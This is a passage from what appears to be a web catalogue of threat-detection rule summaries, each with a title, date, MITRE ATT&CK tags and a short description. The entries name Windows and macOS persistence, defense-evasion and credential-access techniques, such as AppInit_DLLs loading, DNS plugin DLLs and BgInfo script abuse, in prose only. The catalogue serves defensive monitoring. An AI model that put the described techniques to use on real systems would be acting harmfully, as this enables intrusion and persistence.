Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Read More
New ActiveScriptEventConsumer Created Via Wmic.EXE

Aug 12, 2024 · attack.persistence attack.t1546.003 ·
Share on:

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

Read More
New Application in AppCompat

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

Read More
New BgInfo.EXE Custom DB Path Registry Configuration

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

Read More
New BgInfo.EXE Custom VBScript Registry Configuration

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

Read More
New BgInfo.EXE Custom WMI Query Registry Configuration

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"

Read More
New BITS Job Created Via Bitsadmin

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects the creation of a new bits job by Bitsadmin

Read More
New BITS Job Created Via PowerShell

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects the creation of a new bits job by PowerShell

Read More
New CA Policy by Non-approved Actor

Aug 12, 2024 · attack.defense-evasion attack.t1548 ·
Share on:

Monitor and alert on conditional access changes.

Read More
New Country

Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access ·
Share on:

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

Read More
New Custom Shim Database Created

Aug 12, 2024 · attack.persistence attack.t1547.009 ·
Share on:

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Read More
New DLL Added to AppCertDlls Registry Key

Aug 12, 2024 · attack.persistence attack.t1546.009 ·
Share on:

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

Read More
New DLL Added to AppInit_DLLs Registry Key

Aug 12, 2024 · attack.persistence attack.t1546.010 ·
Share on:

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

Read More
New DLL Registered Via Odbcconf.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218.008 ·
Share on:

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

Read More
New DNS ServerLevelPluginDll Installed

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 attack.t1112 ·
Share on:

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Read More
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 attack.t1112 ·
Share on:

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

Read More
New Federated Domain Added

Aug 12, 2024 · attack.persistence attack.t1136.003 ·
Share on:

Detects the addition of a new Federated Domain.

Read More
New Federated Domain Added - Exchange

Aug 12, 2024 · attack.persistence attack.t1136.003 ·
Share on:

Detects the addition of a new Federated Domain.

Read More
New File Association Using Exefile

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Read More
New File Exclusion Added To Time Machine Via Tmutil - MacOS

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.

Read More
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

Read More
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".

Read More
New Firewall Rule Added Via Netsh.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 attack.s0246 ·
Share on:

Detects the addition of a new rule to the Windows firewall via netsh

Read More
New Generic Credentials Added Via Cmdkey.EXE

Aug 12, 2024 · attack.credential-access attack.t1003.005 ·
Share on:

Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.

Read More
New Github Organization Member Added

Aug 12, 2024 · attack.persistence attack.t1136.003 ·
Share on:

Detects when a new member is added or invited to a github organization.

Read More
New Kernel Driver Via SC.EXE